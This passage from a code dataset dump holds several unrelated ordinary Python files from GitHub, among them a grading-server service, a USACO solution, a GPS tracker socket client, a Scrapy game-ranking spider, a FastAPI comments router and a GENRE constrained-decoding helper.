by\n question numbers and versions, with marker information and other data.\n \"\"\"\n grouped_by_question: Dict[Tuple[int, int], Dict[str, list]] = dict()\n\n for marker, annotation_data in grouped_by_user_annotations.items():\n for question, question_data in annotation_data.items():\n if question not in grouped_by_question:\n grouped_by_question[question] = {\n \"annotations\": [],\n }\n grouped_by_question[question][\"annotations\"].append(\n {\n \"marker\": marker,\n \"annotations_count\": question_data[\"annotations_count\"],\n \"average_marking_time\": question_data[\"average_marking_time\"],\n \"percentage_marked\": question_data[\"percentage_marked\"],\n \"date_format\": question_data[\"date_format\"],\n }\n )\n\n return grouped_by_question\n\n def seconds_to_humanize_time(self, seconds: float) -> str:\n \"\"\"Convert the given number of seconds to a human-readable time string.\n\n Args:\n seconds: the number of seconds, unsigned so no distinction\n is made between past and future.\n\n Returns:\n A human-readable time string.\n \"\"\"\n if seconds > 9:\n return arrow.utcnow().shift(seconds=seconds).humanize(only_distance=True)\n else:\n return (\n arrow.utcnow()\n .shift(seconds=seconds)\n .humanize(only_distance=True, granularity=[\"second\"])\n )\n\n @transaction.atomic\n def get_marking_task_count_based_on_question_number_and_version(\n self, question: int, version: int\n ) -> int:\n \"\"\"Get the count of MarkingTasks based on the given question number and version.\n\n Args:\n question: (int) The question number.\n version: (int) The question version.\n\n Returns:\n int: The count of MarkingTask for the specific question number and version.\n \"\"\"\n return MarkingTask.objects.filter(\n question_number=question, question_version=version\n ).count()\n\n @transaction.atomic\n def filter_annotations_by_time_delta_seconds(\n self, time_delta_seconds: int\n ) -> QuerySet[Annotation]:\n \"\"\"Filter annotations by time in seconds.\n\n Args:\n time_delta_seconds: (int) Number of seconds.\n\n Returns:\n QuerySet: Filtered queryset of annotations.\n \"\"\"\n annotations = (\n MarkingTaskService().get_latest_annotations_from_complete_marking_tasks()\n )\n\n if time_delta_seconds == 0:\n return annotations\n else:\n time_interval_start = timezone.now() - timedelta(seconds=time_delta_seconds)\n return annotations.filter(time_of_last_update__gte=time_interval_start)\n\n @transaction.atomic\n def get_time_of_latest_updated_annotation(self) -> str:\n \"\"\"Get the human readable time of the latest updated annotation.\n\n Returns:\n Human-readable time of the latest updated annotation or\n the string ``\"never\"`` if there have not been any annotations.\n \"\"\"\n try:\n annotations = (\n MarkingTaskService().get_latest_annotations_from_complete_marking_tasks()\n )\n latest_annotation = annotations.latest(\"time_of_last_update\")\n except ObjectDoesNotExist:\n return \"never\"\n return arrow.get(latest_annotation.time_of_last_update).humanize()\n","repo_name":"plomgrading/plom","sub_path":"plom_server/Progress/services/userinfo_service.py","file_name":"userinfo_service.py","file_ext":"py","file_size_in_byte":9044,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"22897145897","text":"fileName=\"\"\"\nLANG: PYTHON3\nTASK: friday\n\"\"\".split()[-1]\n\nfin = open('%s.in' % fileName) \nN = int(fin.readline().strip())\n\nrslt = [0, 0, 0, 0, 0, 0, 0]\ndays = 13 - 31\nfor year in range(1900, 1900+N):\n for month in range(12):\n if month in (0,1,3,5,7,8,10):\n days += 31\n elif month in (4,6,9,11):\n days += 30\n else:\n days += 28\n if year % 400 == 0 or year % 4 == 0 and year % 100 > 0:\n days += 1\n rslt[ (days+1) % 7 ] += 1\n\nwith open('%s.out' % fileName, 'w') as fout:\n fout.write( '%s\\n' % ' '.join(map(str,rslt)) )\n","repo_name":"back/USACO","sub_path":"Gateway 1.2/friday.py","file_name":"friday.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"28482438539","text":"from functools import wraps\nfrom itertools import chain, cycle\nfrom logging import getLogger\nfrom socket import create_connection\nimport struct\nfrom threading import Semaphore\nfrom uuid import uuid4\n\nfrom wialond.util import binary\nfrom wialond.util.crc16 import calc_crc16\nfrom wialond.util.concurrency import AsyncResult, Event, spawn\n\nlogger = getLogger(__name__)\n\n\nclass ConnectionClosedError(ConnectionError):\n pass\n\n\ndef _io_operation(func):\n @wraps(func)\n def wrapper(self, *args, **kwargs):\n try:\n return func(self, *args, **kwargs)\n except ConnectionError:\n self.close()\n raise\n return wrapper\n\n\nclass Connection:\n\n def __init__(self, addr):\n self._socket = create_connection(addr)\n self._reader = self._socket.makefile(mode='rb')\n self._acks = {}\n self._message_counter = cycle(range(1 << 16))\n self._closed = Event()\n self._write_mutex = Semaphore()\n self._listen_thread = spawn(self._listen)\n\n @property\n def active(self):\n return not self._closed.is_set()\n\n def wait_for_close(self, *args, **kwargs):\n return self._closed.wait(*args, **kwargs)\n\n def __enter__(self):\n return self\n\n def __exit__(self, *args):\n self.close()\n self._listen_thread.join()\n\n def send_login(self, mac):\n mac = '{mac}\\0'.format(mac=mac).encode()\n payload = struct.pack('!BB{}s'.format(len(mac)), 1, 64, mac)\n return self._send_message(0, binary.pack_var(len(payload), 2) + payload)\n\n def send_picture(self, timestamp, data):\n index = binary.pack_var(0, 1)\n return self._send_data(\n timestamp,\n b''.join([\n binary.pack_var(3, 1),\n index,\n binary.pack_var(len(data), 2),\n index,\n '{}\\0'.format(uuid4().hex).encode(),\n data,\n ])\n )\n\n def send_position(self, timestamp, position):\n lat, lon, speed, course, height, stats, hdop = position\n return self._send_data(\n timestamp,\n struct.pack(\n '!BIIHHHBH',\n 1, int(lat * 1000000), int(lon * 1000000),\n int(speed), int(course),\n int(height), stats, int(hdop)\n ),\n )\n\n def send_keep_alive(self):\n return self._send_message(2)\n\n def _send_data(self, timestamp, data):\n payload = struct.pack('!IB{}s'.format(len(data)), timestamp, 1, data)\n return self._send_message(1, binary.pack_var(len(payload), 2) + payload)\n\n def _send_message(self, msg_type, payload=b''):\n seq = next(self._message_counter)\n async_result = AsyncResult()\n self._acks[seq] = async_result\n body = b''.join([\n binary.pack_uint[2](0x2424),\n binary.pack_var(msg_type, 1),\n binary.pack_uint[2](seq),\n payload,\n ])\n if msg_type != 2:\n body += binary.pack_uint[2](calc_crc16(body))\n self.write(body)\n return async_result\n\n @_io_operation\n def read(self, size=-1):\n data = self._reader.read(size)\n if size > 0 and not data:\n raise ConnectionClosedError\n return data\n\n @_io_operation\n def readline(self, size=-1):\n data = self._reader.readline(size)\n if size > 0 and not data:\n raise ConnectionClosedError\n return data\n\n @_io_operation\n def write(self, b):\n with self._write_mutex:\n return self._socket.sendall(b)\n\n def close(self):\n self._closed.set()\n self._socket.close()\n self._reader.close()\n while self._acks:\n _, async_result = self._acks.popitem()\n async_result.set_error(ConnectionClosedError)\n\n def _listen(self):\n try:\n while self.active:\n self._handle_message()\n except ConnectionClosedError:\n pass\n except Exception:\n logger.error(\"Connection listen failure\", exc_info=1)\n self.close()\n\n def _handle_message(self):\n header_buf = self.read(3)\n head, code = struct.unpack('!HB', header_buf)\n assert head == 0x4040, str([head, code])\n if code == 255:\n self._handle_command(header_buf)\n elif 0 <= code <= 4:\n self._handle_ack(code)\n else:\n raise ValueError(\"Invalid code value: {}\".format(code))\n\n def _handle_ack(self, code):\n (seq,) = struct.unpack('!H', self.read(2))\n async_result = self._acks.pop(seq, None)\n if async_result is None:\n return\n if code == 0:\n async_result.set_result(True)\n else:\n async_result.set_error(Exception(code))\n\n def _handle_command(self, header_buf):\n size, size_buf = binary.read_var_with_buf(self, 2)\n timestamp_buf = self.read(4)\n binary.unpack_uint[4](timestamp_buf) # ignored timestamp\n cmd_type, cmd_type_buf = binary.read_var_with_buf(self, 1)\n assert cmd_type == 0\n data = self.readline()\n crc16 = binary.read_uint[2](self)\n calced_crc16 = calc_crc16(\n chain(header_buf, size_buf, timestamp_buf, cmd_type_buf, data)\n )\n if crc16 != calced_crc16:\n raise ValueError(\"Invalid crc16: {} != {}\".format(crc16, calced_crc16))\n","repo_name":"frostoov/wialond","sub_path":"wialond/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8044865124","text":"from tkinter import *\nfrom tkinter import ttk\n\ndef print_hierarchy(w, depth = 0):\n print(\n ' ' * depth + w.winfo_class()\n + ' w=' + str(w.winfo_width()) + \" h=\" + str(w.winfo_height())\n + ' x=' + str(w.winfo_x()) + ' y=' + str(w.winfo_y())\n )\n for chw in w.winfo_children():\n print_hierarchy(chw, depth+1)\n\nclass FeetToMeters:\n def __init__(self, root):\n root.title(\"Feet to Meters Calculator\")\n self.mainframe = ttk.Frame(root, padding=\"50 30 50 30\")\n self.mainframe.grid(column=0, row=0, sticky=(N, W, E, S))\n root.columnconfigure(0, weight=1)\n root.rowconfigure(0, weight=1)\n\n # MVC - Model\n self.feet = StringVar() # input model\n self.meters = StringVar() # output model\n\n self.feet_entry = ttk.Entry(self.mainframe, width=7, textvariable=self.feet) # bind model to view\n self.feet_entry.grid(column=1, row=1, columnspan=2, rowspan=1, sticky=(W, E))\n\n meter_label = ttk.Label(self.mainframe, textvariable=self.meters) # bind model to view\n meter_label.grid(column=2, row=2, sticky=(W, E))\n\n ttk.Label(self.mainframe, text=\"is equivalent to\").grid(column=1, row=2, sticky=(E))\n ttk.Label(self.mainframe, text=\"feet\").grid(column=3, row=1, sticky=(W))\n ttk.Label(self.mainframe, text=\"meters\").grid(column=3, row=2, sticky=(W))\n\n # bind Control function - Observer pattern\n ttk.Button(self.mainframe, text=\"Calculate\", command=self.calculate).grid(column=3, row=3, sticky=(W))\n for child in self.mainframe.winfo_children():\n child.grid_configure(padx=15, pady=15)\n\n self.feet_entry.focus()\n # Observer: View -> Controller\n root.bind(\"<Return>\", self.calculate)\n\n def calculate(self, *args):\n try:\n value = float(self.feet.get())\n self.meters.set(int(0.3048 * value *1000.0 + 0.5) / 1000.0)\n except ValueError:\n pass\n\n\nif __name__ == '__main__':\n root = Tk()\n FeetToMeters(root)\n print_hierarchy(root)\n root.mainloop()","repo_name":"iproduct/intro-python","sub_path":"08-tkinter-lab/02_example_class.py","file_name":"02_example_class.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"12819956751","text":"import logging\n\nlogger = logging.getLogger()\n\nformatter = logging.Formatter('%(process)d %(asctime)s %(name)-12s %(levelname)-8s %(message)s')\n\nstream_handler = logging.StreamHandler()\nstream_handler.setFormatter(formatter)\nlogger.addHandler(stream_handler)\nlogger.setLevel(logging.INFO)","repo_name":"tristantr/projet7","sub_path":"grandpy/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12740397141","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom game.items import HotGameItem\nimport re\nimport requests\nimport json\n\n\n# 一周热榜\nclass HotgameSpider(scrapy.Spider):\n name = 'hotgame'\n allowed_domains = ['17173.com']\n start_urls = ['http://top.17173.com/list-2-0-0-0-0-0-0-0-0-0-1.html']\n page = 1\n\n def parse(self, response):\n if self.page <= 36:\n self.page += 1\n next_url = 'http://top.17173.com/list-2-0-0-0-0-0-0-0-0-0-' + str(self.page) + '.html'\n game_list = response.xpath('//ul[@class=\"list-plate js-rank\"]//li')\n for game_info in game_list:\n game_title = game_info.xpath('.//div[@class=\"con\"]/a/text()').extract_first()\n detail_url = game_info.xpath('.//div[@class=\"con\"]/a/@href').extract_first()\n test_status = game_info.xpath('.//div[@class=\"c5\"]/text()').extract_first().strip()\n game_id = re.findall('\\d+', detail_url)[1]\n yield scrapy.Request(detail_url, callback=self.parse_detail, meta={'game_id': game_id})\n yield scrapy.Request(next_url, callback=self.parse)\n\n def parse_detail(self, response):\n game_id = response.meta['game_id']\n print('游戏热榜详情')\n # 图片链接\n img_url = response.xpath('//span[@class=\"avatar-t\"]//span/img/@href').extract_first()\n # 游戏名称\n title = response.xpath('//h1/text()').extract_first()\n # 评星\n star = response.xpath('//div[@class=\"mod-mater-info\"]/div/text()').extract_first().strip('')\n # 风格\n style = ''\n for item in response.xpath('//div[@class=\"box-mater-cate\"]//a'):\n style += item.xpath('./text()').extract_first() + ','\n # 游戏类型\n game_type = response.xpath('//ul[@class=\"list-mater-info\"]//li[1]//a/text()').extract_first()\n # 游戏语言\n game_language = response.xpath('//ul[@class=\"list-mater-info\"]//li[2]//a/text()').extract_first()\n # 是否收费\n is_free = response.xpath('//ul[@class=\"list-mater-info\"]//li[3]//span[2]/text()').extract_first().strip()\n # 支持平台\n item_plat = response.xpath('//ul[@class=\"list-mater-info\"]//li[4]//a/@title').extract_first()\n # 开发商\n kaifashang = response.xpath('//ul[@class=\"list-mater-info\"]//li[5]//a/text()').extract_first()\n # 注册网址\n register_url = response.xpath('//ul[@class=\"list-mater-info\"]//li[6]//span[2]/text()').extract_first()\n # 运营商\n item_operator = response.xpath('//ul[@class=\"list-mater-info\"]//li[7]//span[2]//a/@title').extract_first()\n # 简介\n content = response.xpath('//div[@class=\"mod-mater-intro\"]/p/text()').extract_first().strip()\n print('-' * 200)\n item = HotGameItem()\n item['img_url'] = img_url\n item['title'] = title\n item['star'] = star\n item['style'] = style\n item['game_type'] = game_type\n item['game_language'] = game_language\n item['is_free'] = is_free\n item['item_plat'] = item_plat\n item['kaifashang'] = kaifashang\n item['register_url'] = register_url\n item['item_operator'] = item_operator\n item['content'] = content\n\n # 福利通知我的接口\n fuli_url = 'http://hao.17173.com/api/getGameScheCount?game_codes=' + str(\n game_id) + ' & callback=jsonp & callback=jQuery111105772122356899088_1532679883818 & _=1532679883819'\n response = requests.get(fuli_url).text\n response = re.search('{.*?}.*?}', response).group()\n result_dict = json.loads(response)\n fuli = result_dict['data'][game_id + ' ']\n item['fuli'] = fuli\n # 投票数和排名\n rank_url = 'http://top.17173.com/api/gamerankinfo?gameCode=' + str(game_id) + '.js&_=1532680359400'\n response = requests.get(rank_url).text\n result = re.findall('{.*?}', response)[2]\n result_dict = json.loads(result)\n ranking = result_dict['rank_num']\n votes = result_dict['heats_num']\n item['votes'] = votes\n item['ranking'] = ranking\n yield item","repo_name":"panghupy/17173-","sub_path":"game/game/spiders/hotgame.py","file_name":"hotgame.py","file_ext":"py","file_size_in_byte":4163,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"18751118748","text":"#!/usr/bin/env python3\n# https://leetcode.com/problems/insertion-sort-list/\n\nimport unittest\nfrom typing import Optional\n\n\nclass ListNode:\n def __init__(self, val=0, following=None):\n self.val = val\n self.next = following\n\n\nclass Solution:\n def insertionSortList(\n self, head: Optional[ListNode]\n ) -> Optional[ListNode]:\n handle = ListNode(0)\n handle.next = head\n tail = handle\n while tail.next is not None:\n # Grab first node after the tail of already ordered nodes\n node = tail.next\n # Remove (extract) that node from the list\n tail.next = tail.next.next\n # Iterate from the node holding the head\n current = handle\n inserted = False\n # Iterate until we reach the node beyond the extracted node\n while current.next is not tail.next:\n # When a node with greater or equal value found\n # then insert extracted node before it\n if node.val <= current.next.val:\n node.next = current.next\n current.next = node\n inserted = True\n break\n # Move on to the next ordered node\n current = current.next\n # If the extracted node was not inserted then insert it\n # at the end of the ordered list\n if not inserted:\n node.next = tail.next\n current.next = node\n # The extracted node becomes the tail of the ordered list\n tail = node\n return handle.next\n\n\nclass TestCode(unittest.TestCase):\n def test_example(self):\n n1 = ListNode(1)\n n2 = ListNode(2)\n n3 = ListNode(3)\n n4 = ListNode(4)\n n5 = ListNode(5)\n n6 = ListNode(6)\n n6.next = n3\n n3.next = n4\n n4.next = n5\n n5.next = n2\n n2.next = n1\n result = Solution().insertionSortList(n6)\n self.assertEqual(n1, result)\n self.assertEqual(n2, n1.next)\n self.assertEqual(n3, n2.next)\n self.assertEqual(n4, n3.next)\n self.assertEqual(n5, n4.next)\n self.assertEqual(n6, n5.next)\n self.assertEqual(None, n6.next)\n\n def test_1_1(self):\n n1_a = ListNode(1)\n n1_b = ListNode(1)\n n1_a.next = n1_b\n result = Solution().insertionSortList(n1_a)\n self.assertEqual(n1_b, result)\n self.assertEqual(n1_a, n1_b.next)\n self.assertEqual(None, n1_a.next)\n","repo_name":"altermarkive/training","sub_path":"algorithms/code/leetcode/lc147_insertion_sort_list/lc147_insertion_sort_list.py","file_name":"lc147_insertion_sort_list.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"27421128800","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nimport time\r\n\r\n# Set the URL of the page to download\r\nurl = \"https://www.classcentral.com/\"\r\n\r\n# Start a new instance of the Chrome driver\r\ndriver = webdriver.Chrome()\r\n\r\n# Load the page and wait for it to load completely\r\ndriver.get(url)\r\ntime.sleep(5)\r\n\r\n# Find the Courses button and hover over it\r\nbutton = driver.find_element(\"xpath\", '//*[@id=\"page-home\"]/div[1]/header/div[1]/nav/div[1]/button[2]')\r\nActionChains(driver).move_to_element(button).perform()\r\n\r\n# Wait for the dynamic content to load\r\ntime.sleep(2)\r\n\r\n# Get the HTML content of the loaded dynamic content\r\ndynamic_content = driver.find_element(\"xpath\", '//*[@id=\"page-home\"]/div[1]/header/div[1]/nav/div[1]/nav/div').get_attribute('innerHTML')\r\n\r\nActionChains(driver).move_by_offset(200, 10).perform()\r\n\r\n# Save the downloaded HTML to a file\r\nwith open('classcentral.html', 'w') as f:\r\n f.write(driver.page_source)\r\n f.write(dynamic_content)\r\n\r\n# Quit the driver\r\ndriver.quit()\r\n","repo_name":"HitenM/Automation-Scripts","sub_path":"scraper_script_selenium.py","file_name":"scraper_script_selenium.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8101330828","text":"from pyrogram import Client, Filters, StopPropagation, InlineKeyboardButton, InlineKeyboardMarkup\n\n\n@Client.on_message(Filters.command([\"help\"]),group=-2)\nasync def help(client, message):\n # return\n joinButton = InlineKeyboardMarkup([\n [InlineKeyboardButton(\"⚙ Developer ⚙\", url=\"https://t.me/Amani_m_h_d\")],\n [InlineKeyboardButton(\n \"💢 Other Bots 💢\", url=\"https://t.me/My_Test_botz\")]\n ])\n helptxt = f\"<b>Hai, Follow these Steps..</b> \\n\\n➠ Send Me Your Youtube Link And Select Desired Option To Be Uploaded To Telegram \\n\\n➠ Currently Only Supports Youtube Single (No playlist) Just Send Any Youtube Link \\n\\n<b>📜Quote : </b><code>കിടന്ന് അടി വയ്ക്കരുത് എല്ലാർക്കും ഉപയോഗിക്കാൻ പറ്റും😌</code>\"\n await message.reply_text(helptxt, reply_markup=joinButton)\n raise StopPropagation\n\n\n\n\n","repo_name":"MasterThalapathy/YouTube_Downloader_Bot","sub_path":"plugins/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37341498932","text":"from services.user_service import UserService\nfrom models.result import Result\nfrom fastapi import APIRouter, Depends, Response, BackgroundTasks\nfrom services.mlflow_service import MLflowService\nfrom services.model_comment_service import ModelCommentService\nfrom services.user_photo_service import UserPhotoService\nfrom libs.email_lib import Email\nimport util.validation as Validation\nimport schemas.user as UserSchema\nimport schemas.model_comment as ModelCommentSchema\nimport middleware.auth as AuthMiddleware\n\nrouter = APIRouter()\n\n# Add comment\n@router.post('/models/{model_name}/comments', status_code=200)\ndef add_comment(model_name: str, model_comment: ModelCommentSchema.ModelCommentAdd, response: Response, background_tasks: BackgroundTasks, current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n # Check if model exists\n model = MLflowService.get_model(model_name)\n\n if model.is_fail():\n response.status_code = model.get_status_code()\n return model.to_dict()\n\n model_comment.comment = Validation.trim_whitespaces(text=model_comment.comment)\n\n # Add comment\n result = ModelCommentService.add_comment(model_name=model_name, user_id=current_user.data.id, comment=model_comment.comment)\n\n if result.is_fail():\n response.status_code = result.get_status_code()\n return result.to_dict()\n\n # Send email if comment was not made by model's owner\n if model.data.tags['user_id'] is not None and model.data.tags['user_id'] != current_user.data.username:\n try:\n # Get model owner's data\n model_owner = UserService.get_user_by_username(model.data.tags['user_id'])\n\n if model_owner.is_success():\n background_tasks.add_task(\n Email().send_new_model_comment_email,\n model_owner.data.email,\n model_owner.data.name,\n model_name,\n current_user.data.name,\n model_comment.comment\n )\n except:\n pass\n\n return result.to_dict()\n\n# Get comments\n@router.get('/models/{model_name}/comments', status_code=200)\ndef get_model_comments(model_name, response: Response, count_only: bool = False, page_number: int = 1, results_per_page: int = 10):\n # Check if model exists\n model = MLflowService.get_model(model_name)\n\n if model.is_fail():\n response.status_code = model.get_status_code()\n return model.to_dict()\n\n # Get comments\n model_comments = ModelCommentService.get_model_comments(\n model_name=model_name,\n count_only=count_only,\n page_number=page_number,\n results_per_page=results_per_page\n )\n\n if model_comments.is_fail():\n response.status_code = model_comments.get_status_code()\n\n # Return results straight away when count_only equals True\n if count_only:\n return model_comments.to_dict()\n\n results = []\n\n # Get and format comments' data\n for model_comment in model_comments.data:\n # Get commenter\n user = UserService.get_user_by_id(model_comment.user_id)\n username: str = ''\n name: str = ''\n\n if user.is_success():\n username = user.data.username\n name = user.data.name\n user_photo = None\n\n try:\n user_photo = UserPhotoService.get_user_photo(username)\n except:\n user_photo = None\n\n # Format model comment\n model_comment_dict = ModelCommentSchema.ModelCommentList(\n id=model_comment.id,\n comment=model_comment.comment,\n model_name=model_comment.model_name,\n created_at=model_comment.created_at,\n username=username,\n name=name,\n user_photo=user_photo\n )\n\n results.append(model_comment_dict)\n\n return Result(\n Result.SUCCESS,\n model_comments.message,\n results\n ).to_dict()\n\n# Delete comment\n@router.delete('/models/{model_name}/comments/{comment_id}', status_code=200)\ndef delete_comment(model_name: str, comment_id: int, response: Response, current_user: UserSchema.UserBase = Depends(AuthMiddleware.get_current_user)):\n # Check if model exists\n model = MLflowService.get_model(model_name)\n\n if model.is_fail():\n response.status_code = model.get_status_code()\n return model.to_dict()\n\n # Check if comment exists\n model_comment = ModelCommentService.get_comment(comment_id)\n\n if model_comment.is_fail():\n response.status_code = model_comment.get_status_code()\n return model_comment.to_dict()\n\n # Get commenter data\n commenter = UserService.get_user_by_id(model_comment.data.user_id)\n\n if commenter.is_fail():\n response.status_code = commenter.get_status_code()\n return commenter.to_dict()\n\n # Check if current user has permission to delete comment. Comment can only be deleted by commenter\n if commenter.data.username != current_user.data.username:\n result = Result(\n Result.FAIL,\n 'You do not have permissions to delete this comment',\n Result.UNAUTHORIZED\n )\n response.status_code = result.get_status_code()\n return result.to_dict()\n\n deleted_comment = ModelCommentService.delete_comment(comment_id)\n\n if deleted_comment.is_fail():\n response.status_code = deleted_comment.get_status_code()\n\n return deleted_comment.to_dict()\n","repo_name":"shippedbrain/shipped-brain-backend","sub_path":"api/src/routers/model_comments.py","file_name":"model_comments.py","file_ext":"py","file_size_in_byte":5484,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"112235356","text":"class BestStationChoice:\n edges = None\n statNodes = None\n statChoice = None\n\n cust_cnt = None\n charge_tm = None\n distof = None\n timeof = None\n def __init__(self, edges, statNodes, cust_cnt, charge_tm):\n self.edges, self.statNodes, self.cust_cnt, self.charge_tm = edges, statNodes, cust_cnt, charge_tm\n self.timeof = lambda x, y: self.edges.get_edge(x, y).spend_tm if x!=y else 0\n self.distof = lambda x, y: self.edges.get_edge(x, y).dist if x!=y else 0\n \n def get_station_choice(self):\n self.statChoice = list()\n for i in range(self.cust_cnt):\n print(i)\n self.statChoice.append(list())\n for j in range(self.cust_cnt):\n choice = (None, (None, None), None, None)\n for stat in self.statNodes:\n dist_pre = self.distof(i, stat.id)\n dist_nxt = self.distof(stat.id, j)\n time = self.timeof(i, stat.id) + self.charge_tm + self.timeof(stat.id, j)\n if(choice[0] == None or dist_pre + dist_nxt < choice[1][0] + choice[1][1]):\n choice = (stat.id, (dist_pre, dist_nxt), time, stat)\n self.statChoice[i].append(choice)\n return self.statChoice\n\nclass Stations:\n choiceInfo = None\n cust_cnt = None\n inputFile = None\n def __init__(self, cust_cnt, fileName):\n self.cust_cnt = cust_cnt\n self.inputFile = open(fileName, \"r\")\n\n def read_best_choice(self):\n self.choiceInfo = list()\n\n data = self.inputFile.read()\n edges_str = data.split('\\n')\n for line in edges_str:\n if(line != ''):\n block = [int(x) for x in line.split(',')]\n self.choiceInfo.append((block[0], (block[1], block[2]), block[3]))\n return lambda x, y: self.choiceInfo[x * self.cust_cnt + y - 1]\n\n\ndef init_best_station(edges, statNodes, cust_cnt, charge_tm, outputFile):\n Choice = BestStationChoice(edges, statNodes, cust_cnt, charge_tm)\n statChoice = Choice.get_station_choice()\n for line in statChoice:\n string = \"\"\n for block in line:\n string += \"%d,%d,%d,%d\\n\" % (block[0], block[1][0], block[1][1], block[2])\n outputFile.write(string)\n\ndef get_best_station(cust_cnt, fileName):\n chargeChoice = Stations(cust_cnt, fileName)\n return chargeChoice.read_best_choice()","repo_name":"scPointer/MAA-VRPTW","sub_path":"tool/BestStation.py","file_name":"BestStation.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"42919407695","text":"def aniversariantes_de_setembro(lista):\n dict = {}\n i=0\n nomedata = lista.values()\n for k,v in lista.items():\n if v[3] == '0' and v[4] == '9':\n dict[k] = v\n i += 1\n return dict\n ","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_328/ch76_2020_04_12_18_50_31_507612.py","file_name":"ch76_2020_04_12_18_50_31_507612.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8181390523","text":"from typing import Dict, List\n\nimport torch\nfrom genre.trie import Trie\n\nkeyword = ['select', 'distinct', 'from', 'join', 'on', 'where', 'group', 'by', 'order', 'asc', 'desc', 'limit',\n 'having',\n 'and', 'not', 'or', 'like', 'between', 'in',\n 'sum', 'count', 'max', 'min', 'avg',\n '(', ')', ',', '>', '<', '=', '>=', '!=', '<=',\n 'union', 'except', 'intersect',\n '1', '2', '3', '4', '5']\n\n\ndef get_end_to_end_prefix_allowed_tokens_fn_hf(\n model,\n sentences: List[str],\n start_mention_token=\"{\",\n end_mention_token=\"}\",\n start_entity_token=\"[\",\n end_entity_token=\"]\",\n mention_trie: Trie = None,\n candidates_trie: Trie = None,\n mention_to_candidates_dict: Dict[str, List[str]] = None,\n):\n return _get_end_to_end_prefix_allowed_tokens_fn(\n lambda x: model.tokenizer.encode(x),\n lambda x: model.tokenizer.decode(torch.tensor(x)),\n model.tokenizer.bos_token_id,\n model.tokenizer.pad_token_id,\n model.tokenizer.eos_token_id,\n len(model.tokenizer) - 1,\n sentences,\n start_mention_token,\n end_mention_token,\n start_entity_token,\n end_entity_token,\n mention_trie,\n candidates_trie,\n mention_to_candidates_dict,\n )\n\n\ndef get_end_to_end_prefix_allowed_tokens_fn_fairseq(\n model,\n sentences: List[str],\n start_mention_token=\"{\",\n end_mention_token=\"}\",\n start_entity_token=\"[\",\n end_entity_token=\"]\",\n mention_trie: Trie = None,\n candidates_trie: Trie = None,\n mention_to_candidates_dict: Dict[str, List[str]] = None,\n):\n return _get_end_to_end_prefix_allowed_tokens_fn(\n lambda x: model.encode(x).tolist(),\n lambda x: model.decode(torch.tensor(x)),\n model.model.decoder.dictionary.bos(),\n model.model.decoder.dictionary.pad(),\n model.model.decoder.dictionary.eos(),\n len(model.model.decoder.dictionary),\n sentences,\n start_mention_token,\n end_mention_token,\n start_entity_token,\n end_entity_token,\n mention_trie,\n candidates_trie,\n mention_to_candidates_dict,\n )\n\n\ndef _get_end_to_end_prefix_allowed_tokens_fn(\n encode_fn,\n decode_fn,\n bos_token_id,\n pad_token_id,\n eos_token_id,\n vocabulary_length,\n sentences: List[str],\n start_mention_token=\"{\",\n end_mention_token=\"}\",\n start_entity_token=\"[\",\n end_entity_token=\"]\",\n mention_trie: Trie = None,\n candidates_trie: Trie = None,\n mention_to_candidates_dict: Dict[str, List[str]] = None,\n):\n assert not (\n candidates_trie is not None and mention_to_candidates_dict is not None\n ), \"`candidates_trie` and `mention_to_candidates_dict` cannot be both != `None`\"\n\n codes = {}\n codes[\"EOS\"] = eos_token_id\n codes[\"BOS\"] = bos_token_id\n\n keyword_codes = {k: encode_fn(\" {}\".format(k))[1] for k in keyword}\n keyword_codes['wselect'] = encode_fn(\"{}\".format('select'))[1]\n\n def prefix_allowed_tokens_fn(batch_id, sent):\n sent = sent.tolist()\n trie_out = get_trie_schema(sent)\n return trie_out\n\n def get_trie_schema(sent):\n pointer_start = get_keyword_mention(sent)\n keyword_rnt = list(keyword_codes.values())\n\n if pointer_start + 1 < len(sent) and pointer_start != -1:\n ment_next = mention_trie.get(sent[pointer_start + 1:])\n if codes[\"EOS\"] in ment_next:\n return ment_next + keyword_rnt\n else:\n return ment_next\n else:\n ment_next = mention_trie.get([])\n return ment_next + keyword_rnt + [codes[\"EOS\"]]\n\n def get_keyword_mention(sent):\n pointer_start = -1\n for i, e in enumerate(sent):\n if e in keyword_codes.values():\n pointer_start = i\n return pointer_start\n\n return prefix_allowed_tokens_fn\n","repo_name":"microsoft/ContextualSP","sub_path":"unified_parser_text_to_sql/genre/entity_linking.py","file_name":"entity_linking.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","stars":348,"dataset":"github-code","pt":"21"} +{"seq_id":"9839127406","text":"# resurces\n# https://github.com/italia/covid19-opendata-vaccini\n# 